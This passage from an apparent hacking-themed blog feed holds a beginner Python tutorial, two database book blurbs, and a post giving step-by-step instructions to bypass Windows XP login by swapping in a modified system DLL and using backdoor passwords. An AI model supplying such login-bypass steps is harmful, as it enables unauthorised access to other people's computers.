/&gt;&lt;br /&gt;if temperature &gt; 50:&lt;br /&gt;    print "The salad is properly cooked."&lt;br /&gt;else:&lt;br /&gt;    print "Cook the salad some more."&lt;br /&gt;&lt;br /&gt;The meaning of this should be obvious: If the temperature is higher than 50 (centigrades), then print out a message telling the user that it is properly cooked, otherwise, tell the user to cook the salad some more.&lt;br /&gt;&lt;br /&gt;Note: The indentation is important in Python. Blocks in conditional execution (and loops and function definitions — see below) must be indented (and indented by the same amount of whitespace; a tab counts as 8 spaces) so that the interpreter can tell where they begin and end. It also makes the program more readable to humans.&lt;br /&gt;&lt;br /&gt;Let’s return to our area calculations. Can you see what this program does?&lt;br /&gt;&lt;br /&gt;# Area calculation program&lt;br /&gt;&lt;br /&gt;print "Welcome to the Area calculation program"&lt;br /&gt;print "–––––––––––––"&lt;br /&gt;print&lt;br /&gt;&lt;br /&gt;# Print out the menu:&lt;br /&gt;print "Please select a shape:"&lt;br /&gt;print "1  Rectangle"&lt;br /&gt;print "2  Circle"&lt;br /&gt;&lt;br /&gt;# Get the user's choice:&lt;br /&gt;shape = input("&gt; ")&lt;br /&gt;&lt;br /&gt;# Calculate the area:&lt;br /&gt;if shape == 1:&lt;br /&gt;    height = input("Please enter the height: ")&lt;br /&gt;    width = input("Please enter the width: ")&lt;br /&gt;    area = height*width&lt;br /&gt;    print "The area is", area&lt;br /&gt;else:&lt;br /&gt;    radius = input("Please enter the radius: ")&lt;br /&gt;    area = 3.14*(radius**2)&lt;br /&gt;    print "The area is", area&lt;br /&gt;&lt;br /&gt;New things in this example:&lt;br /&gt;&lt;br /&gt;   1. print used all by iself prints out an empty line&lt;br /&gt;   2. == checks whether two things are equal, as opposed to =, which assigns the value on the right side to the variable on the left. This is an important distinction!&lt;br /&gt;   3. ** is Python’s power operator — thus the squared radius is written radius**2.&lt;br /&gt;   4. print can print out more than one thing. Just separate them with commas. (They will be separated by single spaces in the output.)&lt;br /&gt;&lt;br /&gt;The program is quite simple: It asks for a number, which tells it whether the user wants to calculate the area of a rectangle or a circle. Then, it uses an if-statement (conditional execution) to decide which block it should use for the area calculation. These two blocks are essentially the same as those used in the previous area examples. Notice how the comments make the code more readable. It has been said that the first commandment of programming is: “Thou shalt comment!” Anyway — it’s a nice habit to acquire.&lt;br /&gt;Exercise 1&lt;br /&gt;&lt;br /&gt;Extend the program above to include area calculations on squares, where the user only has to enter the length of one side. There is one thing you need to know to do this: If you have more than two choices, you can write something like:&lt;br /&gt;&lt;br /&gt;if foo == 1:&lt;br /&gt;    # Do something…&lt;br /&gt;elif foo == 2:&lt;br /&gt;    # Do something else…&lt;br /&gt;elif foo == 3:&lt;br /&gt;    # Do something completely different…&lt;br /&gt;else:&lt;br /&gt;    # If all else fails…&lt;br /&gt;&lt;br /&gt;Here elif is a mysterious code which means “else if” :). So; if foo is one, then do something; otherwise, if foo is two, then do something else, etc. You might want to add other options to the programs too — like triangles or arbitrary polygons. It’s up to you.&lt;br /&gt;Loops&lt;br /&gt;&lt;br /&gt;Sequential execution and conditionals are only two of the three fundamental building blocks of programming. The third is the loop. In the previous section I proposed a solution for checking if the spam was heated, but it was quite clearly inadequate. What if the spam wasn’t finished the next time we checked either? How could we know how many times we needed to check it? The truth is, we couldn’t. And we shouldn’t have to. We should be able to ask the computer to keep checking until it was done. How do we do that? You guessed it — we use a loop, or repeated execution.&lt;br /&gt;&lt;br /&gt;Python has two loop types: while-loops and for-loops. For-loops are perhaps the simplest. For instance:&lt;br /&gt;&lt;br /&gt;for food in "spam", "eggs", "tomatoes":&lt;br /&gt;    print "I love", food&lt;br /&gt;&lt;br /&gt;This means: For every element in the list "spam", "eggs", "tomatoes", print that you love it. The block inside the loop is executed once for every element, and each time, the current element is assigned to the variable food (in this case). Another example:&lt;br /&gt;&lt;br /&gt;for number in range(1,100):&lt;br /&gt;    print "Hello, world!"&lt;br /&gt;    print "Just", 100 - number, "more to go…"&lt;br /&gt;&lt;br /&gt;print "Hello, world"&lt;br /&gt;print "That was the last one… Phew!"&lt;br /&gt;&lt;br /&gt;The function range returns a list of numbers in the range given (including the first, excluding the last… In this case, [1..99]). So, to paraphrase this:&lt;br /&gt;&lt;br /&gt;    The contents of the loop is executed for each number in the range of numbers from (and including) 1 up to (and excluding) 100. (What the loop body and the following statements actually do is left as an exercise.)&lt;br /&gt;&lt;br /&gt;But this doesn’t really help us with our cooking problem. If we want to check the spam a hundred times, then it would be quite a nice solution; but we don’t know if that’s enough — or if it’s too much. We just want to keep checking it while it is not hot enough (or, until it is hot enough — a matter of point-of-view). So, we use while:&lt;br /&gt;&lt;br /&gt;# Spam-cooking program&lt;br /&gt;&lt;br /&gt;# Fetch the function *sleep*&lt;br /&gt;from time import sleep&lt;br /&gt;&lt;br /&gt;print "Please start cooking the spam. (I'll be back in 3 minutes.)"&lt;br /&gt;&lt;br /&gt;# Wait for 3 minutes (that is, 3*60 seconds)…&lt;br /&gt;sleep(180)&lt;br /&gt;&lt;br /&gt;print "I'm baaack :)"&lt;br /&gt;&lt;br /&gt;# How hot is hot enough?&lt;br /&gt;hot_enough = 50&lt;br /&gt;&lt;br /&gt;temperature = input("How hot is the spam? ")&lt;br /&gt;while temperature &lt; hot_enough:&lt;br /&gt;    print "Not hot enough… Cook it a bit more…"&lt;br /&gt;    sleep(30)&lt;br /&gt;    temperature = input("OK. How hot is it now? ")&lt;br /&gt;&lt;br /&gt;print "It's hot enough - You're done!"&lt;br /&gt;&lt;br /&gt;New things in this example…&lt;br /&gt;&lt;br /&gt;   1. Some useful functions are stored in modules and can be imported. In this case we import the function sleep (which sleeps for a given number of seconds) from the module time which comes with Python. (It is possible to make your own modules too…)&lt;br /&gt;&lt;br /&gt;Exercise 2&lt;br /&gt;&lt;br /&gt;Write a program that continually reads in numbers from the user and adds them together until the sum reaches 100. Write another program that reads 100 numbers from the user and prints out the sum.&lt;br /&gt;Bigger Programs — Abstraction&lt;br /&gt;&lt;br /&gt;If you want an overview of the contents of a book, you don’t plow through all pages — you take a look at the table of contents, right? It simply lists the main topics of the book. Now — imagine writing a cookbook. Many of the recipes, like “Creamy Spam and Macaroni” and “Spam Swiss Pie” may contain similar things, like spam, in this case - yet you wouldn’t want to repeat how to make spam in every recipe. (OK… So you don’t actually make spam… But bear with me for the sake of example :)). You’d put the recipe for spam in a separate chapter, and simply refer to it in the other recipes. So — instead of writing the entire recipe every time, you only had to use the name of a chapter. In computer programming this is called abstraction.&lt;br /&gt;&lt;br /&gt;Have we run into something like this already? Yup. Instead of telling the computer exactly how to get an answer from the user (OK - so we couldn’t really do this… But we couldn’t really make spam either, so there… :)) we simply used input - a function. We can actually make our own functions, to use for this kind of abstraction.&lt;br /&gt;&lt;br /&gt;Let’s say we want to find the largest integer that is less than a given positive number. For instance, given the number 2.7, this would be 2. This is often called the “floor” of the given number. (This could actually be done with built-in Python function int, but again, bear with me…) How would we do this? A simple solution would be to try all possibilities from zero:&lt;br /&gt;&lt;br /&gt;number = input("What is the number? ")&lt;br /&gt;&lt;br /&gt;floor = 0&lt;br /&gt;while floor &lt;= number:&lt;br /&gt;    floor = floor+1&lt;br /&gt;floor = floor-1&lt;br /&gt;&lt;br /&gt;print "The floor of", number, "is", floor&lt;br /&gt;&lt;br /&gt;Notice that the loop ends when floor is no longer less than (or equal to) the number; we add one too much to it. Therefore we have to subtract one afterwards. What if we want to use this “floor”-thing in a complex mathematical expression? We would have to write the entire loop for every number that needed “floor”-ing. Not very nice… You have probably guessed what we will do instead: Put it all in a function of our own, called “floor”:&lt;br /&gt;&lt;br /&gt;def floor(number):&lt;br /&gt;    result = 0&lt;br /&gt;    while result &lt;= number:&lt;br /&gt;        result = result+1&lt;br /&gt;    result = result-1&lt;br /&gt;    return result&lt;br /&gt;&lt;br /&gt;New things in this example…&lt;br /&gt;&lt;br /&gt;   1. Functions are defined with the keyword def, followed by their name and the expected parameters in parentheses.&lt;br /&gt;   2. If the function is to return a value, this is done with the keyword return (which also automatically ends the function.&lt;br /&gt;&lt;br /&gt;Now that we have defined it, we can use it like this:&lt;br /&gt;&lt;br /&gt;x = 2.7&lt;br /&gt;y = floor(2.7)&lt;br /&gt;&lt;br /&gt;After this, y should have the value 2. It is also possible to make functions with more than one parameter:&lt;br /&gt;&lt;br /&gt;def sum(x,y):&lt;br /&gt;    return x+y&lt;br /&gt;&lt;br /&gt;Exercise 3&lt;br /&gt;&lt;br /&gt;Write a function that implements Euclid’s method for finding a common factor of two numbers. It works like this:&lt;br /&gt;&lt;br /&gt;   1. You have two numbers, a and b, where a is larger than b&lt;br /&gt;   2. You repeat the following until b becomes zero:&lt;br /&gt;   3. a is changed to the value of b&lt;br /&gt;   4. b is changed to the remainder when a (before the change) is divided by b (before the change)&lt;br /&gt;   5. You then return the last value of a&lt;br /&gt;&lt;br /&gt;Hints:&lt;br /&gt;&lt;br /&gt;   1. Use a and b as parameters to the function&lt;br /&gt;   2. Simply assume that a is greater than b&lt;br /&gt;   3. The remainder when x is divided by z is calculated by the expression x % z&lt;br /&gt;   4. Two variables can be assigned to simultaneously like this: x, y = y, y+1. Here x is given the value of y (that is, the value y had before the assignment) and y is incremented by one&lt;br /&gt;&lt;br /&gt;More About Functions&lt;br /&gt;&lt;br /&gt;How did the exercise go? Was it difficult? Still a bit confused about functions? Don’t worry — I haven’t left the topic quite yet.&lt;br /&gt;&lt;br /&gt;The sort of abstraction we have used when building functions is often called procedural abstraction, and many languages use the word procedure along with the word function. Actually, the two concepts are different, but both are called functions in Python (since they are defined and used in the same way, more or less.)&lt;br /&gt;&lt;br /&gt;What is the difference (in other languages) between functions and procedures? Well — as you saw in the previous section, functions can return a value. The difference lies in that procedures do not return such a value. In many ways, this way of dividing functions into two types — those who do and those who don’t return values — can be quite useful.&lt;br /&gt;&lt;br /&gt;A function that doesn’t return a value (a “procedure”) is used as a “sub-program” or subroutine. We call the function, and the program does some stuff, like making whipped cream or whatever. We can use this function in many places without rewriting the code. (This is called code reuse — more on that later.)&lt;br /&gt;&lt;br /&gt;The usefulness of such a function (or procedure) lies in its side effects — it changes its environment (by mixing the suger and cream and whipping it, for instance…) Let’s look at an example:&lt;br /&gt;&lt;br /&gt;def hello(who):&lt;br /&gt;    print "Hello,", who&lt;br /&gt;&lt;br /&gt;hello("world")&lt;br /&gt;# Prints out "Hello, world"&lt;br /&gt;&lt;br /&gt;Printing out stuff is considered a side effect, and since that is all this function does, it is quite typical for a so-called procedure. But… It doesn’t really change its environment does it? How could it do that? Let’s try:&lt;br /&gt;&lt;br /&gt;# The *wrong* way of doing it&lt;br /&gt;age = 0&lt;br /&gt;&lt;br /&gt;def setAge(a):&lt;br /&gt;    age = a&lt;br /&gt;&lt;br /&gt;setAge(100)&lt;br /&gt;print age&lt;br /&gt;# Prints "0"&lt;br /&gt;&lt;br /&gt;What’s wrong here? The problem is that the function setAge creates it own local variable, also named age which is only seen inside setAge. How can we avoid that? We can use something called global variables.&lt;br /&gt;&lt;br /&gt;Note: Global variables are not used much in Python. They easily lead to bad structure, or what is called spaghetti code. I use them here to lead up to more complex techniques - please avoid them if you can.&lt;br /&gt;&lt;br /&gt;By telling the interpreter that a variable is global (done with a statement like global age) we effectively tell it to use the variable outside the function instead of creating a new local one. (So, it is global as opposed to local.) The program can then be rewritten like this:&lt;br /&gt;&lt;br /&gt;# The correct, but not-so-good way of doing it&lt;br /&gt;age = 0&lt;br /&gt;&lt;br /&gt;def setAge(a):&lt;br /&gt;    global age&lt;br /&gt;    age = a&lt;br /&gt;&lt;br /&gt;setAge(100)&lt;br /&gt;print age&lt;br /&gt;# Prints "100"&lt;br /&gt;&lt;br /&gt;When you learn about objects (below), you’ll see that a more appropriate way of doing this would be to use an object with an age property and a setAge method. In the section on data structures, you will also see some better examples of functions that change their environment.&lt;br /&gt;&lt;br /&gt;Well — what about real functions, then? What is a function, really? Mathematical functions are like a kind of “machine” that gets some input and calculates a result. It will return the same result every time, when presented with the same input. For instance:&lt;br /&gt;&lt;br /&gt;def square(x):&lt;br /&gt;    return x*x&lt;br /&gt;&lt;br /&gt;This is the same as the mathematical function f(x)=x2. It behaves like a nice function, in that it only relies on its input, and it does not change its environment in any way.&lt;br /&gt;&lt;br /&gt;So — I have outlined two ways of making functions: One type is more like a procedure, and doesn’t return a result; the other is more like a mathematical function and doesn’t do anything but returning a result (almost). Of course, it is possible to do something in between the two extremes, although when a function changes things, it should be clear that it does. You could signal this through its name, for instance by using only a noun for “pure” functions like square and an imperative for procedure-like functions like setAge.&lt;br /&gt;More Ingredients — data structures&lt;br /&gt;&lt;br /&gt;Well — you know a lot already: How to get input and give output, how to structure complicated algorithms (programs) and to perform arithmetic; and yet the best is still to come.&lt;br /&gt;&lt;br /&gt;What ingredients have we been using in our programs up until now? Numbers and strings. Right? Kinda boring… No let’s introduce a couple of other ingredients to make things a bit more exciting.&lt;br /&gt;&lt;br /&gt;Data structures are ingredients that structure data. (Surprise, surprise…) A single number doesn’t really have much structure, does it? But let’s say we want more numbers put together to a single ingredient — that would have some structure. For instance, we might want a list of numbers. That’s easy:&lt;br /&gt;&lt;br /&gt;[3,6,78,93]&lt;br /&gt;&lt;br /&gt;I mentioned lists in the section on loops, but didn’t really say much about them. Well — this is how you make them. Just list the elements, separated by commas and enclosed in brackets.&lt;br /&gt;&lt;br /&gt;Let us jump into an example that calculates primes (numbers divisible only by themselves or 1):&lt;br /&gt;&lt;br /&gt;# Calculate all the primes below 1000&lt;br /&gt;# (Not the best way to do it, but…)&lt;br /&gt;&lt;br /&gt;result = [1]&lt;br /&gt;candidates = range(3,1000)&lt;br /&gt;base = 2&lt;br /&gt;product = base&lt;br /&gt;&lt;br /&gt;while candidates:&lt;br /&gt;    while product &lt; 1000:&lt;br /&gt;        if product in candidates:&lt;br /&gt;            candidates.remove(product)&lt;br /&gt;        product = product+base&lt;br /&gt;    result.append(base)&lt;br /&gt;    base = candidates[0]&lt;br /&gt;    product = base&lt;br /&gt;    del candidates[0]&lt;br /&gt;&lt;br /&gt;result.append(base)&lt;br /&gt;print result&lt;br /&gt;&lt;br /&gt;New things in this example…&lt;br /&gt;&lt;br /&gt;   1. The built-in function range actually returns a list that can be used like all other lists. (It includes the first index, but not the last.)&lt;br /&gt;   2. A list can be used as a logic variable. If it is not empty, then it is true — if it is empty, then it is false. Thus, while candidates means “while the list named candidates is not empty” or simply “while there are still candidates”.&lt;br /&gt;   3. You can write if someElement in someList to check if an element is in a list.&lt;br /&gt;   4. You can write someList.remove(someElement) to remove someElement from someList.&lt;br /&gt;   5. You can append an element to a list by using someList.append(something). Actually, you can use + too (as in someList = someList+[something]) but it is not as efficient.&lt;br /&gt;   6. You can get at an element of a list by giving its position as a number (where the first element, strangely, is element 0) in brackets after the name of the list. Thus someList[3] is the fourth element of the list someList. (More on this below.)&lt;br /&gt;   7. You can delete variables by using the keyword del. It can also be used (as here) to delete elements from a list. Thus del someList[0] deletes the first element of someList. If the list was [1,2,3] before the deletion, it would be [2,3] afterwards.&lt;br /&gt;&lt;br /&gt;Before going on to explaining the mysteries of indexing list elements, I will give a brief explanation of the example.&lt;br /&gt;&lt;br /&gt;This is a version of the ancient algorithm called “The Sieve of Erastothenes” (or something close to that). It considers a set (or in this case, a list) of candidate numbers, and then systematically removes the numbers known not to be primes. How do we know? Because they are products of two other numbers.&lt;br /&gt;&lt;br /&gt;We start with a list of candidates containing numbers [2..999] — we know that 1 is a prime (actually, it may or may not be, depending on who you ask), and we wanted all primes below 1000. (Actually, our list of candidates is [3..999], but 2 is also a candidate, since it is our first base). We also have a list called result which at all times contains the updated results so far. To begin with, this list contains only the number 1. We also have a variable called base. For each iteration (“round”) of the algorithm, we remove all numbers that are some multible of this base number (which is always the smallest of the candidates). After each iteration, we know that the smallest number left is a prime (since all the numbers that were products of the smaller ones are removed — get it?). Therefore, we add it to the result, set the new base to this number, and remove it from the candidate list (so we won’t process it again.) When the candidate list is empty, the result list will contain all the primes. Clever, huh?&lt;br /&gt;&lt;br /&gt;Things to think about: What is special with the first iteration? Here the base is 2, yet that too is removed in the “sieving”? Why? Why doesn’t that happen to the other bases? Can we be sure that product is always in the candidate list when we want to remove it? Why?&lt;br /&gt;&lt;br /&gt;Now — what next? Ah, yes… Indexing. And slicing. These are the ways to get at the individual elements of Python lists. You have already seen ordinary indexing in action. It is pretty straightforward. Actually, I have told you all you need to know about it, except for one thing: Negative indices count from the end of the list. So, someList[-1] is the last element of someList, someList[-2] is the element before that, and so on.&lt;br /&gt;&lt;br /&gt;Slicing, however, should be new to you. It is similar to indexing, except with slicing you can target an entire slice of the list, and not just a single element. How is it done? Like this:&lt;br /&gt;&lt;br /&gt;food = ["spam","spam","eggs","sausages","spam"]&lt;br /&gt;&lt;br /&gt;print food[2:4]&lt;br /&gt;# Prints "['eggs', 'sausages']"&lt;br /&gt;&lt;br /&gt;More Abstraction — Objects and Object-Oriented Programming&lt;br /&gt;&lt;br /&gt;Now there’s a buzz-word if ever there was one: “Object-oriented programming.”&lt;br /&gt;&lt;br /&gt;As the section title suggests, object-oriented programming is just another way of abstracting away details. Procedures abstract simple statements into more complex operations by giving them a name. In OOP, we don’t just treat the operations this way, but objects. (Now, that must have been a big surprise, huh?) For instance, if we were to make a spam-cooking-program, instead of writing lots of procedures that dealt with the temperature, the time, the ingredients etc., we could lump it together into a spam-object. Or, perhaps we could have an oven-object and a clock-object too… Now, things like temperature would just be attributes of the spam-object, while the time could be read from the clock-object. And to make our program do something, we could teach our object some methods; for instance, the oven might know how to cook the spam etc.&lt;br /&gt;&lt;br /&gt;So — how do we do this in Python? Well we can’t just make an object directly. Instead of just making an oven, we make a recipe describing how ovens are. This recipe then describes a class of objects that we call ovens. A very simple oven class might be:&lt;br /&gt;&lt;br /&gt;class Oven:&lt;br /&gt;    def insertSpam(self, spam):&lt;br /&gt;        self.spam = spam&lt;br /&gt;&lt;br /&gt;    def getSpam(self):&lt;br /&gt;        return self.spam&lt;br /&gt;&lt;br /&gt;Now, does this look weird, or what?&lt;br /&gt;&lt;br /&gt;New things in this example…&lt;br /&gt;&lt;br /&gt;   1. Classes of objects are defined with the keyword class.&lt;br /&gt;   2. Class names usually start with capital letters, whereas functions and variables (as well as methods and attributes) start with lowercase letters.&lt;br /&gt;   3. Methods (i.e. the functions or operations that the objects know how to do) are defined in the normal way, but inside the class block.&lt;br /&gt;   4. All object methods should have a first parameter called self (or something similar…) The reason will (hopefully) become clear in a moment.&lt;br /&gt;   5. Attributes and methods of an object are accessed like this: mySpam.temperature = 2, or dilbert.be_nice().&lt;br /&gt;&lt;br /&gt;I would guess that some things are still a bit unclear about the example. For instance, what is this self thing? And, now that we have an object recipe (i.e. class), how do we actually make an object?&lt;br /&gt;&lt;br /&gt;Let’s tackle the last point first. An object is created by calling the classname as if it were a function:&lt;br /&gt;&lt;br /&gt;myOven = Oven()&lt;br /&gt;&lt;br /&gt;myOven now contains an Oven object, usually called an instance of the class Oven. Let’s assume that we have made a class Spam as well; then we could do something like:&lt;br /&gt;&lt;br /&gt;mySpam = Spam()&lt;br /&gt;myOven.insertSpam(mySpam)&lt;br /&gt;&lt;br /&gt;myOven.spam would now contain mySpam. How come? Because, when we call one of the methods of an object, the first parameter, usually called self, always contains the object itself. (Clever, huh?) Thus, the line self.spam = spam sets the attribute spam of the current Oven object to the value of the parameter spam. Note that these are two different things, even though they are both called spam in this example.&lt;br /&gt;Answer to Exercise 3&lt;br /&gt;&lt;br /&gt;Here is a very concise version of the algorithm:&lt;br /&gt;&lt;br /&gt;def euclid(a,b):&lt;br /&gt;    while b:&lt;br /&gt;        a,b = b,a % b&lt;br /&gt;    return a&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-6831734436920996623?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/6831734436920996623/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/09/instant-hacking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/6831734436920996623'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/6831734436920996623'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/09/instant-hacking.html' title='Instant Hacking'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2417174588601349332</id><published>2009-08-09T01:05:00.000-07:00</published><updated>2009-10-08T05:40:50.748-07:00</updated><title type='text'>Recover the Password using DreamPackPL</title><content type='html'>Thanks for the steps from Giftson&lt;br /&gt;&lt;br /&gt;Steps to Hack into a Windows XP Computer without changing password:&lt;br /&gt;&lt;br /&gt;   1. Get physical access to the machine. Remember that it must have a CD or DVD drive.&lt;br /&gt;   2. Download DreamPackPL http://www.d–b.webpark.pl/dreampackpl_en.htm&lt;br /&gt;   3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.&lt;br /&gt;   4. Use any burning program that can burn ISO images.&lt;br /&gt;   5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will &lt;span class="fullpost"&gt;load some files.&lt;br /&gt;   6. Press “R” to install DreamPackPL.&lt;br /&gt;   7. Press “C” to install DreamPackPL by using the recovery console.&lt;br /&gt;   8. Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)&lt;br /&gt;   9. Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)&lt;br /&gt;  10. Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)&lt;br /&gt;  11. Type “exit”, take out disk and reboot.&lt;br /&gt;  12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.&lt;br /&gt;  13. Click the top graphic on the DreamPack menu and you will get a menu popup.&lt;br /&gt;  14. Go to commands and enable the options and enable the god command.&lt;br /&gt;  15. Type “god” in the password field to get in Windows.&lt;br /&gt;&lt;br /&gt;You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.&lt;br /&gt;&lt;br /&gt;Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass the Windows Login screen and it is not destructive.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2417174588601349332?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.clazh.com/how-to-hack-or-crack-a-windows-xp-administrator-password/' title='Recover the Password using DreamPackPL'/><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2417174588601349332/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/08/recover-password-using-dreampackpl.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2417174588601349332'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2417174588601349332'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/08/recover-password-using-dreampackpl.html' title='Recover the Password using DreamPackPL'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5422866577275504789</id><published>2009-08-09T01:00:00.001-07:00</published><updated>2009-10-08T05:40:39.132-07:00</updated><title type='text'>SQL in a Nutshell, Third Edition</title><content type='html'>Description&lt;br /&gt;&lt;br /&gt;The essential reference to the SQL language used in today's most popular database products, this new edition of SQL in a Nutshell clearly documents every SQL command according to the latest ANSI standard. It also details how these commands are implemented in the Microsoft SQL Server 2008 and Oracle 11g commercial database packages, and the MySQL 5.1 and PostgreSQL 8.3 open source database products.&lt;br /&gt;Full Description&lt;br /&gt;For programmers, analysts, and database administrators, SQL in a Nutshell is the essential reference for the SQL language used in today's most popular database products. This new edition clearly documents every &lt;span class="fullpost"&gt;SQL command according to the latest ANSI standard, and details how those commands are implemented in Microsoft SQL Server 2008, Oracle 11g, and the MySQL 5.1 and PostgreSQL 8.3 open source database products. You'll also get a concise overview of the Relational Database Management System (RDBMS) model, and a clear-cut explanation of foundational RDBMS concepts -- all packed into a succinct, comprehensive, and easy-to-use format. This book provides:&lt;br /&gt;&lt;br /&gt;    * Background on the Relational Database Model, including current and previous SQL standards&lt;br /&gt;    * Fundamental concepts necessary for understanding relational databases and SQL commands&lt;br /&gt;    * An alphabetical command reference to SQL statements, according to the SQL2003 ANSI standard&lt;br /&gt;    * The implementation of each command by MySQL, Oracle, PostgreSQL, and SQL Server&lt;br /&gt;    * An alphabetical reference of the ANSI SQL2003 functions, as well as the vendor implementations&lt;br /&gt;    * Platform-specific functions unique to each implementation&lt;br /&gt;&lt;br /&gt;Beginning where vendor documentation ends, SQL in a Nutshell distills the experiences of professional database administrators and developers who have used SQL variants to support complex enterprise applications. Whether SQL is new to you, or you've been using SQL since its earliest days, you'll get lots of new tips and techniques in this book.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5422866577275504789?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://oreilly.com/catalog/9780596518844/#top' title='SQL in a Nutshell, Third Edition'/><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5422866577275504789/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/08/sql-in-nutshell-third-edition.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5422866577275504789'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5422866577275504789'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/08/sql-in-nutshell-third-edition.html' title='SQL in a Nutshell, Third Edition'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-4327651280367850921</id><published>2009-08-09T00:58:00.000-07:00</published><updated>2009-10-08T05:40:28.027-07:00</updated><title type='text'>Oracle DBA Pocket Guide</title><content type='html'>Description&lt;br /&gt;&lt;br /&gt;This handy reference helps Oracle database administrators make more effective use of their time by presenting a compact summary of DBA tasks. You have instant access to the most important concepts, best practices, tips, and checklists. Key topics include architecture, installation, configuration, tuning, and backup/recovery. Covers Oracle Database 9i and Oracle Database 10g.&lt;br /&gt;Full Description&lt;br /&gt;The Oracle database is one of the most popular in the world, and for good reason. It's compatible, scalable, portable, and &lt;span class="fullpost"&gt;capable of performing incredibly fast. The advantages Oracle holds over its competition come with a price, however--it's a highly complex database that's becoming more complex with every release. And this level of detail, of course, can begin to weigh on database administrators (DBAs).&lt;br /&gt;&lt;br /&gt;Fortunately, the Oracle DBA Pocket Guide from O'Reilly is on the case. This handy reference is designed to help administrators make more effective use of their time by presenting a compact summary of DBA tasks in an easy-to-use form. With this book by your side, you'll have instant access to the most important concepts, best practices, tips, and checklists. Key topics include architecture, installation, configuration, tuning, and backup/recovery. Everything that you absolutely must know to do your job well is right there at your fingertips.&lt;br /&gt;&lt;br /&gt;Moreover, the Oracle DBA Pocket Guide covers Oracle Database 9i, as well as its latest release, Oracle Database 10g. The first database designed for enterprising grid computing, Oracle Database 10g significantly reduces the cost of managing the IT environment with a simplified install, reduced configuration and management requirements, and automatic performance diagnosis and SQL tuning.&lt;br /&gt;&lt;br /&gt;The latest in O'Reilly's line of bestselling Oracle titles, this book is an invaluable companion for any database administrator--new or experienced--interested in reviewing core Oracle concepts at a glance.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-4327651280367850921?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://oreilly.com/catalog/9780596100490/#top' title='Oracle DBA Pocket Guide'/><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/4327651280367850921/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/08/oracle-dba-pocket-guide.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4327651280367850921'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4327651280367850921'/><link rel='alternate' type='text/html' 